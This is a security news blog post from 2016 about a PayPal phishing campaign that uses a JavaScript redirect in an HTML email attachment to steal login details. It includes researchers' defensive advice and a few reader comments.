Think hovering your mouse over the URL will save you? Think again!

Phishers using JavaScript redirect to steal PayPal credentials

Regular readers are familiar with our ongoing coverage of phishing attacks.

Recently, we reported on an Apple ID SMS-based phishing scam, and described how tax-related phishing attacks surged by 400 percent this year.


The continued success of these and other phishing campaigns reveal a persistent deficit of security awareness among users. Indeed, as we shared in an article earlier in 2016, Tripwire found that more than half (52 percent) of respondents for a survey conducted at RSA were “not confident” in their ability to spot a phishing attack.

That’s troubling news. And as attacks continue to grow in sophistication, it’ll only get harder to spot a phish.

Case in point, phishers are now using a hidden JavaScript redirect method to steal unsuspecting PayPal users’ login information.

On Monday, UK malware researcher @dvk01uk came across the phishing campaign.

Peter Arntz of Malwarebytes explains that fraudsters in these particular attacks are using JavaScript to send users to a legitimate PayPal site while sending their credentials to a different domain that hosts a phishing page:

The javascript runs as soon as the page (HTML attachment) is loaded and intercepts all posts to and diverts them to the actual phishing page to accept all your details, if you are unwise enough to fall for this trick.”

This sophisticated technique negates a common anti-phishing tactic: hovering over a URL to confirm it points to where you would expect it to point.

Fortunately, users can protect themselves against this phishing technique, though for how long remains to be seen. The malware researcher @dvk01uk expands upon this point in a blog post:

The only saving grace with this particular phishing attack is that the phishing page is a HTML page / form that they tell you to open on your computer and not a link to a website. The advice we always give to NOT open any attachments to emails and definitely do not fill in html form attachments should protect you. But once a phisher puts this onto a website with a plausible & believable URL, then all bets are off and it will be almost impossible to detect the phish. This is very worrying.”

Fortunately, PayPal offers users the ability to enable two-step verification, which will help protect their accounts even in the event someone compromises users’ passwords.

Tags: ,

Share this article:

   Join thousands of others and sign up to our free "GCHQ" newsletter.

Smashing Security podcast
Check out "Smashing Security", the award-winning weekly audio podcast, with Graham Cluley, Carole Theriault, and special guests from the world of information security.

"It's brilliant!" • "Three people having fun in an industry often focused on bad news" • Winner of the Best Security Podcast 2018

Latest episodes:
Listen on Apple Podcasts Listen on Google Podcasts


4 Responses

  1. drsolly

    June 15, 2016 at 8:58 pm #

    I’ve been using a non-html mail client since 1995.

  2. dqfozzie

    June 15, 2016 at 11:34 pm #

    PayPal are their own worst enemy when it comes to phishing. They proclaim they are anti-phishing but have links on their ‘Your … statement is available’ emails that look suspicious. I check them out because I’m a security professional but the average person either tires of this process or doesn’t know how to to begin with. Their users have no confidence that they are safe. Best practice is to give no link at all and get the user to go to a known safe bookmark or type it in from scratch. I’ve emailed them. Guess how much response I got:-(

  3. vooboobolly

    June 16, 2016 at 1:32 am #

    Paypal 2FA is not available in all countries! Why not?

  4. graphicequaliser

    June 16, 2016 at 12:21 pm #

    I always login to the site by typing the url, check the SSL padlock before I login, and then login to see a statement or whatever. I have the motto, “If something is running on your computer that is not part of the OS, then you really ought to know what it does and why it is running.” Also, “Don’t install something because you’ve been prompted to. Only install stuff you want.” That, and MJ Registry Watcher have kept me safe for many years!

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.